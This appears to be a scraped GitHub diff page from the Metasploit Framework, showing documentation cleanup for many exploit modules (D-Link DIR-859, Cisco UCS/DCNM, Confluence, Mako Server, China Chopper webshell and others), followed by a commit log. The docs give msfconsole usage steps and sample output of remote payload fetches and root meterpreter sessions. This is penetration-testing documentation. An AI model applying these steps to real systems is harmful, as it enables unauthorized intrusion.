
 Other devices might be affected by the same issue but lack of access to firmware forbids me from confirming that. See https://github.com/QKaiser/awind-research for full list of similar devices.

-## Verification steps
+## Verification Steps

 1. Start `msfconsole`
 2. Do: `use exploit/linux/snmp/awind_snmp_exec`
@@ -66,8 +64,3 @@ Architecture : armv6l
 BuildTuple   : armv5l-linux-musleabi
 Meterpreter  : armle/linux
 ```
-
-## References
-
-* https://github.com/QKaiser/awind-research
-* https://qkaiser.github.io/pentesting/2019/03/27/awind-device-vrd/
@@ -15,6 +15,7 @@
  8. You should get a session

 ## Options
+
  **FILEPATH**  
  The location to write the executable out to on the target. Needs to be writable by the SNMP service user. This defaults to /tmp.  
  
@@ -37,7 +38,7 @@


  
-## Scenario
+## Scenarios

  ```
  msf > use exploit/linux/snmp/net_snmpd_rw_access 
@@ -1,4 +1,4 @@
-## Introduction
+## Vulnerable Application

 This module abuses a known default password on Cisco UCS Director. The 'scpuser'
 has the password of 'scpuser', and allows an attacker to login to the virtual appliance
@@ -9,20 +9,7 @@ Note that Cisco also mentions in their advisory that their IMC Supervisor and
 UCS Director Express are also affected by these vulnerabilities, but this module
 was not tested with those products.

-
-## Author and discoverer
-
-Pedro Ribeiro (pedrib@gmail.com) from Agile Information Security
-
-
-## References
-
-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-usercred
-https://seclists.org/fulldisclosure/2019/Aug/36
-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/cisco-ucs-rce.txt
-
-
-## Usage
+## Scenarios

 Setup RHOST and run it!

@@ -0,0 +1,42 @@
+## Introduction
+
+This module exploits CVE.2019-17621, a remote unauthenticated OS command injection in the UPnP API of the DIR-859 and other D-link SOHO routers via the `service` argument to the `gena.cgi` URL.
+
+## Vulnerable Application
+
+Get a D-Link DIR-859 router (or [any of the devices/firmware versions mentioned here](https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10147)), or download firmware versions 1.06 or 1.05 and run them on firmadyne or similar emulation frameworks.
+
+## Verification Steps
+
+1. Set up router/emulated device
+2. Start `msfconsole`
+3. Do: `use exploit/linux/upnp/dlink_dir859_subscribe_exec`
+4. Do: `set RHOSTS <router_ip>`
+5. Do: `set LHOST <local_ip>`
+6. Do: `run`
+7. You should get a session as `root`.
+
+## Scenarios
+
+### D-link DIR-859 Firmware 1.05
+```
+msf5 exploit(linux/http/dlink_dir859_exec_telnet) > run 
+
+[*] Started reverse TCP handler on 192.168.0.2:4444 
+[*] Using URL: http://192.168.0.2:8080/r2hOQycyVvN2BP
+[*] Client 192.168.0.1 (Wget) requested /r2hOQycyVvN2BP
+[*] Sending payload to 192.168.0.1 (Wget)
+[*] Command Stager progress - 100.00% done (118/118 bytes)
+[*] Meterpreter session 7 opened (192.168.0.2:4444 -> 192.168.0.1:54599) at 2020-01-10 11:36:52 -0300
+[*] Server stopped.
+
+meterpreter > getuid 
+Server username: uid=0, gid=0, euid=0, egid=0
+meterpreter > sysinfo 
+Computer     : 192.168.0.1
+OS           :  (Linux 2.6.32.70)
+Architecture : mips
+BuildTuple   : mips-linux-muslsf
+Meterpreter  : mipsbe/linux
+meterpreter >
+```
@@ -1,7 +1,7 @@
-China Chopper Caidao PHP Backdoor or simply [Chinese Caidao](https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html) is a webshell manager coded in PHP.
-
 ## Vulnerable Application

+China Chopper Caidao PHP Backdoor or simply [Chinese Caidao](https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html) is a webshell manager coded in PHP.
+
 Here is the [PHP code](https://github.com/rapid7/metasploit-framework/files/430643/caidao.zip) of the backdoor that you can use and save it as caidao.php.

 ## Verification Steps
@@ -28,7 +28,7 @@ Here is the [PHP code](https://github.com/rapid7/metasploit-framework/files/4306
  
  PASSWORD by default is `chopper`, which is the password of the backdoor.

-## Demonstration
+## Scenarios

 ```
 msf exploit(caidao_php_backdoor_exec) > exploit
@@ -1,4 +1,4 @@
-## Introduction
+## Vulnerable Application

 Cisco Data Center Network Manager exposes a file upload servlet (FileUploadServlet) at /fm/fileUpload.
 An authenticated user can abuse this servlet to upload a WAR to the Apache Tomcat webapps
@@ -12,22 +12,7 @@ The module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and 1
 work on a few versions below 10.4(2). Only version 11.0(1) requires authentication to exploit
 (see References to understand why).

-
-## Author and discoverer
-
-Pedro Ribeiro (pedrib@gmail.com) from Agile Information Security
-
-
-## References
-
-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass
-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-codex
-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-codex
-https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/cisco_dcnm_upload_2019.rb
-https://seclists.org/fulldisclosure/2019/Jul/7
-
-
-## Usage
+## Scenarios

 Setup RHOST, LHOST, LPORT, run it and sit back!

@@ -34,7 +34,7 @@ Affecting Showtime2 CMS Made Simple (CMSMS) module, version 3.6.2, 3.6.1, 3.6.0,
 * **USERNAME**: Username to authenticate with
 * **PASSWORD**: Password to authenticate with

-## Scenario
+## Scenarios

 ### Tested on Showtime 3.6.2 on CMS Made Simple (CMMS) 2.2.10

@@ -10,10 +10,10 @@ References:
 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3396
 https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html

-# Vulnerable Application
+## Vulnerable Application
 Affecting Atlassian Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2.

-# Verification Steps
+## Verification Steps

 - [ ] Setting up a working installation of Atlassian Confluence before 6.6.13, 6.12.3, 6.12.3 or 6.14.2.
 - [ ] Start `msfconsole`
@@ -26,11 +26,11 @@ Affecting Atlassian Confluence before version 6.6.12, from version 6.7.0 before
 - [ ] `exploit`
 - [ ] You should get a meterpreter session.

-# Options
+## Options
 - **TARGETURI**: Path to Atlassian Confluence installation ("/" is the default)
 - **TRIGGERURL**: Url to external video service to trigger vulnerability ("https://www.youtube.com/watch?v=kxopViU98Xo" is the default)

-# Scenario
+## Scenarios
 ## Tested on Confluence 6.8.2 with Windows target
 ```
 msf5 > use exploit/multi/http/confluence_widget_connector
@@ -1,10 +1,9 @@
+## Vulnerable Application
+
 Magento is a popular open-source e-commerce platform written in PHP. An unserialization
 vulnerability exists in the product that allows an unauthenticated user to gain arbitrary
 code execution.

-
-## Vulnerable Application
-
 Magento Community and Enterprise editions before 2.0.6 are affected. The magento_unserialize module
 was specifically tested against version 2.0.6, on Ubuntu 14.04 and Debian.

@@ -87,7 +86,7 @@ After setting up Magento, you can use your exploit module:
 6. Do: ```exploit```
 7. And you should get a session

-## Demonstration
+## Scenarios

 ```
 msf exploit(magento_unserialize) > check
@@ -1,12 +1,10 @@
-## Description
+## Vulnerable Application

  This module exploits a vulnerability found in Mako Server v2.5, 2.6.
  It's possible to inject arbitrary OS commands in the Mako Server tutorial page through a PUT request to save.lsp. Attacker input will be saved on the victims machine and can be executed by sending a GET request to manage.lsp.

  Based on the public PoC found here: https://blogs.securiteam.com/index.php/archives/3391

-## Vulnerable Application
-
  [Mako Server](https://makoserver.net) is an application framework for designing web and IoT applications.

  This module has been verified against the following Mako Server versions for Windows XP SP3, Windows 7 SP1 and Linux Ubuntu 16.04 LTS:
@@ -20,11 +18,9 @@
  - [Linux download page](https://makoserver.net/download/linux-x86)
  - [Documentation](https://makoserver.net/download/manual)

-## References for vulnerability
-  - https://blogs.securiteam.com/index.php/archives/3391
-  - https://www.exploit-db.com/exploits/42683
+## Verification Steps

-## Verification Steps for Windows
+### Windows

  1. Run the installer "mako.windows.x86" on a Windows 7 SP1 (x86/x64) target (with Powershell for this example to work)
  2. After installer finishes, double click the "Mako-Demo" shortcut on the desktop
@@ -36,7 +32,9 @@
  9. Do: ```exploit```
  10. You should get a Windows command shell

-## Verification Steps for Linux
+## Verification Steps
+
+### Linux

  1. Extract the "mako.linux-x64.tar.gz" on a Linux Ubuntu 16.04 LTS (x64) target (with Python for this example to work)
  2. From inside the extracted folder, do ```./rundemo.sh```
@@ -48,7 +46,8 @@
  9. Do: ```exploit```
  10. You should get a Linux command shell (may need to wait ~30 seconds)

-## Example Output
+## Scenarios
+
 ```
 msf > use exploit/multi/http/makoserver_cmd_exec 
 msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3
@@ -70,7 +69,8 @@ C:\Users\Smith\Downloads\MakoServer>

 ```

-## Example Verbose Output
+### Verbose Output
+
 ```
 msf > use exploit/multi/http/makoserver_cmd_exec 
 msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3
@@ -102,8 +102,6 @@ C:\Users\Smith\Downloads\MakoServer>

 ```

-## Scenarios
-
 ### Targeting Windows 7 SP1 x64 running Mako Server v2.5

  A typical scenario would be to obtain a Windows command shell and then upgrade to a Meterpreter session:
@@ -177,7 +175,7 @@ C:\Users\Smith\Downloads\MakoServer>
  Meterpreter     : x86/windows
  ```

-### Targeting Linux Ubuntu 16.04 LTS x64 running Mako Server v2.5
+### Linux Ubuntu 16.04 LTS x64 running Mako Server v2.5

  A typical scenario would be to obtain a Linux command shell and then upgrade to a Meterpreter session:

@@ -3,7 +3,7 @@ MonstraCMS 3.0.4 allows users to upload arbitrary files which leads to remote co
 This module was tested against MonstraCMS 3.0.4.
 Additional information and vulnerabilities can be viewed on Exploit-DB [43348](https://www.exploit-db.com/exploits/43348/).

-## Vulnerable Application 
+## Verification Steps
 Available at [Exploit-DB](https://www.exploit-db.com/apps/23663fc7b47c4c1e476b793ea53660bc-monstra-3.0.4.zip)

 ### Vulnerable Application Installation Setup
@@ -6,7 +6,7 @@ Together these vulnerabilities allow an unauthenticated attacker to execute arbi

 This module was tested against Navigate CMS 2.8.

-## Vulnerable Application 
+## Verification Steps

 [Navigate CMS 2.8](https://master.dl.sourceforge.net/project/navigatecms/releases/navigate-2.8r1302.zip)

@@ -21,7 +21,7 @@
  6. Do: ```set PASSWORD <pass>```
  7. You should get a shell.

-## Verification
+## Verification Steps

  ```
  msf5 > use exploit/multi/http/october_upload_bypass_exec
@@ -9,7 +9,7 @@ java.io.IOException: Cannot run program "/bin/sh": CreateProcess error=2, The sy
 Continuing ...
 ```

-# Vulnerable Application
+## Vulnerable Application

 Oracle WebLogic server versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0 with access to Web Services Atomic Transaction (WS-AT) endpoints are vulnerable to unauthenticated arbitrary command execution.

@@ -1,13 +1,13 @@
+## Vulnerable Application
+
 This module leverages a privilege escalation on OrientDB to execute unsandboxed OS commands.

-All versions from 2.2.2 up to 2.2.22 should be vulnerable.
+All versions from 2.2.2 up to and including 2.2.22 should be vulnerable.

 The module is based on the public PoC found here: [securiteam](https://blogs.securiteam.com/index.php/archives/3318)

-## Vulnerable Application
-OrientDB 2.2.2 <= 2.2.22
+### Installation

-## Installation
 Download a vulnerable OrientDB version here: [orientdb](http://orientdb.com/download-previous/)

 ```
@@ -19,18 +19,12 @@ cd bin
 ./server.sh
 ```

-## References for running OrientDB 
+### References for running OrientDB 

 [Install](http://orientdb.com/docs/2.0/orientdb.wiki/Tutorial-Installation.html)

 [Run](http://orientdb.com/docs/2.0/orientdb.wiki/Tutorial-Run-the-server.html)

-## References for vulnerability
-
-[securiteam](https://blogs.securiteam.com/index.php/archives/3318)
-[palada](http://www.palada.net/index.php/2017/07/13/news-2112/)
-[github](https://github.com/orientechnologies/orientdb/wiki/OrientDB-2.2-Release-Notes#2223---july-11-2017)
-
 ## Verification Steps

 1. Start `msfconsole`
@@ -43,7 +37,7 @@ cd bin
 8.  `run`
 9. **Verify** you get a session

-## Example Output
+## Scenarios

 ### OrientDB 2.2.20 on Windows XP

@@ -32,7 +32,7 @@ Set up a default installation of Pimcore 4.x or 5.x (e.g.: `composer create-proj
 * **USERNAME**: Username to authenticate with
 * **PASSWORD**: Password to authenticate with

-## Scenario
+## Scenarios

 ### Tested on Pimcore 5.6.6

@@ -1,7 +1,7 @@
 ## Description
 This module exploits a code injection vulnerability within an authenticated file upload feature in PlaySMS v1.4. This issue is caused by improper file name handling in sendfromfile.php file. Authenticated Users can upload a file and rename the file with a malicious payload. Additional information and vulnerabilities can be viewed on Exploit-DB [42044](https://www.exploit-db.com/exploits/42003/).

-## Vulnerable Application 
+## Verification Steps
 Available at [Exploit-DB](https://www.exploit-db.com/apps/577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz)

 ### Vulnerable Application Installation Setup.
@@ -1,7 +1,7 @@
 ## Description
 A malicious file can be uploaded by an authenticated attacker through the import.php (aka the Phonebook import feature) in PlaySMS version 1.4. Additional information and vulnerabilities can be viewed on Exploit-DB [42044]( https://www.exploit-db.com/exploits/42044/) and [CVE-2017-9101](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9101)

-## Vulnerable Application 
+## Verification Steps
 Available at [Exploit-DB](https://www.exploit-db.com/apps/577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz)

 ### Vulnerable Application Installation Setup.
--- a/Show More
+++ b/Show More
Author	SHA1	Message	Date
Metasploit	f4e34d0a42	automatic module_metadata_base.json update	2020-01-22 16:42:45 -06:00
wvu-r7	0f453a11e9	Land #12877 , rand_text fix for doublepulsar_rce	2020-01-22 16:40:24 -06:00
William Vu	355ddba6c9	Prefer exploit.rb's rand_text wrapper	2020-01-22 16:37:36 -06:00
tperry-r7	3518b9465c	Merge pull request #12831 from h00die/doc_cleanup Documentation standardization. This is the first step in standardizing the module documentation.	2020-01-22 14:53:12 -06:00
dwelch-r7	75371ec1e1	Land #12874 , Add rand_text* debugging support for ranges	2020-01-22 17:00:22 +00:00
Brent Cook	4770557df4	Land #12873 , enable custom cookies in Windows reverse http/https payloads	2020-01-22 09:41:39 -06:00
dwelch-r7	66328675f7	Give flag correct name	2020-01-22 15:23:13 +00:00
Metasploit	eb59bb7e99	automatic module_metadata_base.json update	2020-01-22 07:18:14 -06:00
Brent Cook	6f6cc00871	Land #12751 , add Linux RDS socket NP deref privesc	2020-01-22 07:08:47 -06:00
Brent Cook	5bccf66dcc	handle Ranges with rand_text while in debug mode	2020-01-22 05:31:33 -06:00
h00die	11ed7c9a4b	Land #12857 , date updates in license and copyright	2020-01-21 17:23:54 -05:00
dwelch-r7	1088448aac	Add flags to send custom cookies	2020-01-21 19:29:34 +00:00
Metasploit	7b7f56ec04	automatic module_metadata_base.json update	2020-01-21 08:52:47 -06:00
Shelby Pace	ccc7b7747f	Land #12773 , add NVMS directory traversal	2020-01-21 08:44:14 -06:00
Shelby Pace	231c858383	add target_uri to request	2020-01-21 08:43:19 -06:00
Metasploit	2e33a72d2a	automatic module_metadata_base.json update	2020-01-21 07:41:03 -06:00
Shelby Pace	e7e42b7a59	Land #12768 , add dlink command injection module	2020-01-21 07:37:43 -06:00
h00die	bc312420ca	module doc standardizations	2020-01-20 21:41:32 -05:00
h00die	ca59b06fd3	module doc standardizations	2020-01-20 21:26:59 -05:00
Dhiraj Mishra	60b5a1791f	removing def data Thanks bcoles	2020-01-20 15:39:45 +04:00
William Vu	7d486b3374	Update LICENSE and COPYING	2020-01-18 18:45:37 -06:00
William Vu	19fa008b43	Land #12856 , whitespace cleanup in cracker lib	2020-01-18 17:58:18 -06:00
h00die	9a376c8d97	tighten whitespace	2020-01-18 14:28:10 -05:00
Brendan Coles	36b6ceb56f	Add rds_atomic_free_op_null_pointer_deref_priv_esc (CVE-2018-5333)	2020-01-18 08:34:52 +00:00
Dhiraj Mishra	256855b152	Adding TARGETURI	2020-01-18 13:56:13 +05:30
William Vu	909b298bd9	Land #12790 , hashcat -O	2020-01-17 20:37:27 -06:00
William Vu	27ea63ad25	Prefer %w[] instead of %w()	2020-01-17 20:37:12 -06:00
secenv	09801b2507	Add router module/firmware version tested ... under Scenarios, as suggested by @space-r7	2020-01-17 20:57:44 -03:00
secenv	52c7bf6375	Add "Verification Steps" as suggested by @space-r7.	2020-01-17 20:48:37 -03:00
secenv	7fbdf0ca57	documentation: s/Setup/Vulnerable Application/ Co-Authored-By: Shelby Pace <40177151+space-r7@users.noreply.github.com>	2020-01-17 20:35:27 -03:00
secenv	bd8840fb09	documentation: s/Usage/Scenarios/ Co-Authored-By: Shelby Pace <40177151+space-r7@users.noreply.github.com>	2020-01-17 20:32:27 -03:00
secenv	c0800f4742	Fix typo in documentation Co-Authored-By: Shelby Pace <40177151+space-r7@users.noreply.github.com>	2020-01-17 20:31:47 -03:00
Metasploit	f826d7747d	automatic module_metadata_base.json update	2020-01-16 16:21:33 -06:00
Brent Cook	7f74d28245	Land #12845 , check for SSL when SSL is not enabled	2020-01-16 16:12:53 -06:00
h00die	1ff12d05ef	spelling	2020-01-16 16:31:39 -05:00
Metasploit	d5138c8af1	automatic module_metadata_base.json update	2020-01-16 15:23:08 -06:00
Adam Cammack	b0d0bac8bd	Land #12846 , Use new `immutable?` method	2020-01-16 15:14:26 -06:00
William Vu	60b787bde1	Use new immutable? method in modules	2020-01-16 15:05:11 -06:00
William Vu	a31e4034c8	Check SSL in exploit/linux/http/webmin_backdoor	2020-01-16 14:49:13 -06:00
Metasploit	549de0934a	automatic module_metadata_base.json update	2020-01-16 14:30:53 -06:00
William Vu	7646e43ccf	Land #12776 , PROTOCOL option for sunrpc_portmapper	2020-01-16 14:21:22 -06:00
William Vu	bb583672bf	Fix style	2020-01-16 14:21:09 -06:00
Metasploit	4ddb1204cc	automatic module_metadata_base.json update	2020-01-16 14:10:03 -06:00
William Vu	6712458dbd	Land #12758 , attributes and immutable? methods	2020-01-16 14:01:29 -06:00
Metasploit	45d8e0f4d3	automatic module_metadata_base.json update	2020-01-16 13:35:47 -06:00
William Vu	441d6c3532	Add immutable? wrapper around attributes method	2020-01-16 13:25:09 -06:00
Adam Cammack	47a3d7fa42	Land #12836 , Pin internal gem major versions	2020-01-16 13:23:46 -06:00
William Vu	6bb414ed53	Land #12757 , _write_file_unix_shell randomization	2020-01-16 13:19:43 -06:00
William Vu	c53e7703fc	Land #12795 , lwp-request CmdStager	2020-01-16 13:17:41 -06:00
William Vu	2a3f7d8b13	Update rex-exploitation to 0.1.22	2020-01-16 13:15:15 -06:00
Adam Cammack	4ee92a1554	Land #12823 , Fix Lua bind payloads	2020-01-16 13:13:01 -06:00
Adam Cammack	ab5f5ea74a	Land #12808 , Add job descriptions for UDP handlers	2020-01-16 13:08:19 -06:00
Metasploit	ccd9c8f082	automatic module_metadata_base.json update	2020-01-16 12:14:35 -06:00
bwatters-r7	ee5e9dc922	Land #12832 , DisablePayloadHandler replace strings with bools Merge branch 'land-12832' into upstream-master	2020-01-16 12:10:34 -06:00
Metasploit	895099f82e	Bump version of framework to 5.0.71	2020-01-16 12:04:20 -06:00
h00die	f3c75e93f3	remove tailing double pounds	2020-01-16 11:57:52 -05:00
h00die	a9bf72ac8c	## Options ## remove trailing ##	2020-01-16 11:55:13 -05:00
h00die	50881c899a	h1 to h2	2020-01-16 11:46:36 -05:00
h00die	dc01f2e99b	remove s from application	2020-01-16 11:45:10 -05:00
h00die	f970ea7963	example output to scenarios	2020-01-16 11:41:12 -05:00
h00die	e4013846d3	more standardizations	2020-01-16 11:32:02 -05:00
h00die	947102e2fe	sample output to scenarios	2020-01-16 11:15:06 -05:00
h00die	b2e0950bba	caps	2020-01-16 11:09:29 -05:00
h00die	a1978c76a6	fix up spaces on options header	2020-01-16 10:52:13 -05:00
h00die	4b0ab94043	module options to options	2020-01-16 10:49:22 -05:00
h00die	2fff1f66e9	vulnerable application h1 to h2	2020-01-16 10:44:35 -05:00
h00die	3a4209a092	verification to verification steps	2020-01-16 10:41:12 -05:00
h00die	c904b9d2f2	scenario to scenarios	2020-01-16 10:36:38 -05:00
Metasploit	cebde261ad	automatic module_metadata_base.json update	2020-01-16 07:59:59 -06:00
h00die	c4d6feb0aa	Land #12721 , windows post module docs	2020-01-16 08:50:19 -05:00
h00die	9e1bc8afae	doc updates	2020-01-16 08:48:31 -05:00
Jeffrey Martin	d32c81b322	limit compatible gems in preparation for Rails 5	2020-01-15 15:54:53 -06:00
Metasploit	5c123e5c1d	automatic module_metadata_base.json update	2020-01-15 10:26:33 -06:00
Spencer McIntyre	033a0d1868	Land #12782 , add the Plantronics LPE module	2020-01-15 11:17:41 -05:00
h00die	fa73709b3e	documentation standardization	2020-01-14 21:02:53 -05:00
Dave York	7b14442ab0	replace strings with bools	2020-01-14 20:47:27 -05:00
Metasploit	2081215aae	automatic module_metadata_base.json update	2020-01-14 17:17:10 -06:00
wvu-r7	2a31319256	Land #12828 , enhanced check for Citrix scanner	2020-01-14 17:08:47 -06:00
Metasploit	1c1003ac59	Bump version of framework to 5.0.70	2020-01-14 13:30:44 -06:00
William Vu	0760319ddf	Check for whitespace in [global] directive	2020-01-14 11:21:03 -06:00
Metasploit	4327e94b9f	automatic module_metadata_base.json update	2020-01-14 11:03:41 -06:00
William Vu	491c36ccaa	Land #12827 , credit updates to Citrix exploit	2020-01-14 10:54:57 -06:00
William Vu	eaeaae7607	Reformat credit	2020-01-14 10:46:04 -06:00
Jeffrey Martin	1cd75d9f40	document additional PoC authors	2020-01-14 10:22:26 -06:00
Metasploit	5251614c3a	automatic module_metadata_base.json update	2020-01-14 08:39:17 -06:00
Shelby Pace	429329c45d	Land #12801 , add WePresent cmd injection module	2020-01-14 08:29:40 -06:00
Jacob Baines	009ec162de	Use string interpolation and removed rundant namespace and return statement	2020-01-14 07:52:30 -05:00
Jacob Baines	ea6263e6bb	Removed redundant return statement	2020-01-14 06:52:24 -05:00
Jacob Baines	ecb825ea71	Remove redundant parameters.	2020-01-14 06:40:40 -05:00
Jacob Baines	fa661e58ca	Unified the POST request into one function. Fixed hardcoding of SSL. Fixed Author formatting. Fixed connection failure check in check function	2020-01-14 06:22:00 -05:00
Jacob Baines	0308f76bbd	Switched to vars_post in send_request_cgi and removed unnecessary documentation	2020-01-14 05:42:06 -05:00
L	58a3f88907	update CacheSize	2020-01-14 17:34:47 +08:00
L	d6041f1af5	fix bind_lua	2020-01-14 17:10:43 +08:00
Metasploit	1832f3fd8a	automatic module_metadata_base.json update	2020-01-14 01:00:16 -06:00
William Vu	a1d9985143	Land #12821 , exploit/linux/http/webmin_backdoor Moved from exploit/unix/webapp/webmin_backdoor.	2020-01-14 00:56:28 -06:00
William Vu	5c4189fdb4	Move unix/webapp/webmin_backdoor to linux/http	2020-01-14 00:50:04 -06:00
Metasploit	b6a6ea5d28	automatic module_metadata_base.json update	2020-01-14 00:49:19 -06:00
William Vu	1636008db6	Land #12820 : Fix #12813 , send_request_cgi change	2020-01-14 00:45:03 -06:00
William Vu	002fe64057	Update pulse_secure_file_disclosure, too Since I bypassed query/vars_get, send_request_cgi is fine now.	2020-01-14 00:34:06 -06:00
William Vu	16d06b3baa	Prefer send_request_cgi over send_request_raw	2020-01-14 00:25:18 -06:00
Metasploit	bb58cf55fb	automatic module_metadata_base.json update	2020-01-13 22:44:31 -06:00
William Vu	8e553c1478	Land #12816 , Citrix CVE-2019-19781 exploit	2020-01-13 22:40:36 -06:00
William Vu	72d06b0e9c	Update Pulse Secure file disclosure module Just the comment.	2020-01-13 22:27:29 -06:00
William Vu	3a8b630262	Set a sane default HttpClientTimeout Totally forgot I did this for Pulse Secure.	2020-01-13 22:26:26 -06:00
William Vu	92de0b132f	Make HttpClientTimeout a float, f'ing finally	2020-01-13 22:25:18 -06:00
William Vu	cd65efb259	Revert tuned timeout in favor of HttpClientTimeout Bad habit!	2020-01-13 22:02:12 -06:00
William Vu	c71a75950a	Make cmd/unix/generic timeout configurable	2020-01-13 21:35:10 -06:00
William Vu	93c69b3a96	Bump send_request_cgi timeout to 3.5s for shells	2020-01-13 21:29:28 -06:00
William Vu	d996ba5b2c	Revert future-proofed yet shitty case statement	2020-01-13 21:09:07 -06:00
William Vu	a635676604	Update wording in module description	2020-01-13 21:04:07 -06:00
William Vu	4cbbe23b11	Improve wording in doc	2020-01-13 21:02:56 -06:00
William Vu	249702ea51	Explain credit in scanner	2020-01-13 20:57:35 -06:00
William Vu	b4550933bb	Update module doc	2020-01-13 20:51:58 -06:00
William Vu	af4505f007	Clean up module	2020-01-13 20:48:18 -06:00
Metasploit	0359a79792	automatic module_metadata_base.json update	2020-01-13 20:26:34 -06:00
William Vu	fe23d4b72b	Clobber datastore in CheckModule again! Seems adding VHOST and SSL wasn't enough. This is a stopgap...	2020-01-13 20:25:07 -06:00
William Vu	04084f84f7	Run rubocop -a	2020-01-13 20:25:07 -06:00
William Vu	a45821b706	Rename module	2020-01-13 20:25:07 -06:00
William Vu	b4a08503f8	Merge remote-tracking branch 'upstream/master' into pr/12816	2020-01-13 20:25:00 -06:00
William Vu	6c4970f901	Land #12819 : Fix #12813 , Twitter handle correction	2020-01-13 20:21:46 -06:00
William Vu	c9041dae28	Fix @altjx's Twitter handle (@altonjx)	2020-01-13 20:19:48 -06:00
Metasploit	55a3f2aac1	automatic module_metadata_base.json update	2020-01-13 18:25:38 -06:00
William Vu	6498a7c231	Land #12813 , Citrix CVE-2019-19781 scanner	2020-01-13 18:16:51 -06:00
William Vu	99235c729f	Clean up module doc	2020-01-13 18:05:42 -06:00
William Vu	4ac7f81542	Add Twitter handles	2020-01-13 17:54:28 -06:00
William Vu	3354e69c47	Improve smb.conf check and add PATH option	2020-01-13 17:52:14 -06:00
William Vu	332afe89af	Update module doc	2020-01-13 16:45:44 -06:00
William Vu	94b6b6d082	Clean up module	2020-01-13 16:39:05 -06:00
William Vu	d7deb4e80a	Run rubocop -a	2020-01-13 16:39:05 -06:00
William Vu	f1cc40bd77	Rename module	2020-01-13 16:39:05 -06:00
kalba-security	c30cd8e0cc	Add documentation	2020-01-14 00:31:44 +02:00
secenv	eaddce910f	Documentation for dlink_dir859_subscribe_exec	2020-01-13 13:27:42 -03:00
secenv	1429a496da	Remove _telnet from filename No need to keep it, it drops meterpreter as payload now.	2020-01-13 13:18:43 -03:00
secenv	eab0bd5755	Randomize "Callback" header URL	2020-01-13 11:39:23 -03:00
RAMELLA Sébastien	5d3ad626e6	add. documentation	2020-01-13 18:22:09 +04:00
Metasploit	b235f26b60	automatic module_metadata_base.json update	2020-01-12 17:24:51 -06:00
Brent Cook	20cf419e18	Land #12797 , improve BlueKeep over remote networks	2020-01-12 17:15:29 -06:00
RAMELLA Sébastien	1570118a14	fix: again chmod 644 WTF!	2020-01-13 01:43:15 +04:00
RAMELLA Sébastien	a64b0fa9e7	add. python staged meterpreter support	2020-01-13 01:25:29 +04:00
RAMELLA Sébastien	c323df180a	fix. file perms to 664	2020-01-12 22:10:23 +04:00
zerosum0x0	aed9b45229	Merge pull request #5 from busterb/bkmouse move rdp_move_mouse to rdp library, add GROOMDELAY	2020-01-12 10:52:27 -07:00
RAMELLA Sébastien	50637d0d91	add initial source code	2020-01-12 21:12:14 +04:00
Brent Cook	33dadefd53	move rdp_move_mouse to rdp library, add GROOMDELAY	2020-01-12 08:19:44 -06:00
Brent Cook	476eabbffe	Land #12811 , add newline when printing raw payloads to the console	2020-01-12 07:01:34 -06:00
Brent Cook	55d782c640	Land #12812 , update port processing for openvas	2020-01-12 06:52:25 -06:00
Alton Johnson	b3bf82be07	Changed permission from executable to just readable	2020-01-11 19:31:38 -05:00
Jeffrey Martin	25e0355951	update port processing for openvas Port in openvas OMP version 7.0 reports serialize in a new format. <ports max="1000" start="1"><count>3</count> <port>general/tcp<host>192.168.8.100</host><severity>2.6</severity><threat>Low</threat></port> <port>general/CPE-T<host>192.168.8.100</host><severity>0.0</severity><threat>Log</threat></port> <port>general/icmp<host>192.168.8.100</host><severity>0.0</severity><threat>Log</threat></port> <port>445/tcp (IANA: microsoft-ds)<host>192.168.8.100</host><severity>9.3</severity><threat>High</threat></port> <port>139/tcp (IANA: netbios-ssn)<host>192.168.8.100</host><severity>0.0</severity><threat>Log</threat></port> <port>135/tcp (IANA: epmap)<host>192.168.8.100</host><severity>5.0</severity><threat>Medium</threat></port> </ports>	2020-01-11 15:15:56 -06:00
kalba-security	03d6d1aed5	Add citrix_directory_traversal module to /modules/auxiliary/scanner/http/	2020-01-11 22:45:00 +02:00
L	0876b8e7d7	enhancement payload generate raw	2020-01-11 19:43:04 +08:00
Metasploit	d507612817	automatic module_metadata_base.json update	2020-01-10 02:40:26 -06:00
Tim W	2ea5bd139a	Land #12792 , Fix #12791 , check for nil response on connection failure in efs_fmws_userid_bof	2020-01-10 16:31:32 +08:00
L	7f82816065	Add description udp listening information	2020-01-10 14:58:36 +08:00
Adam Cammack	8b18f86169	Land #12806 , Properly invoke bundler in Dockerfile	2020-01-09 13:57:56 -06:00
Metasploit	43daaa9ce5	Bump version of framework to 5.0.69	2020-01-09 12:05:24 -06:00
Jeffrey Martin	c169598819	Need to `force` on bunlde when using `clean`.	2020-01-09 11:28:43 -06:00
Jacob Baines	caa02c7d2e	Added exploit module for CVE-2019-3929	2020-01-09 08:03:52 -05:00
zerosum0x0	b76f2a9e08	inject mouse move events, verbose groom progress/elapsed time, danger zone warnings	2020-01-06 23:42:01 -07:00
Brendan Coles	c2a12949a0	Add lwp-request CmdStager	2020-01-06 16:47:17 +00:00
Brendan Coles	326fd26219	Check for nil response due to connection failure	2020-01-05 21:39:34 +00:00
Dhiraj Mishra	8034db2c5f	Update modules/auxiliary/scanner/http/tvt_nvms_traversal.rb Co-Authored-By: acammack-r7 <adam_cammack@rapid7.com>	2020-01-05 12:53:46 +04:00
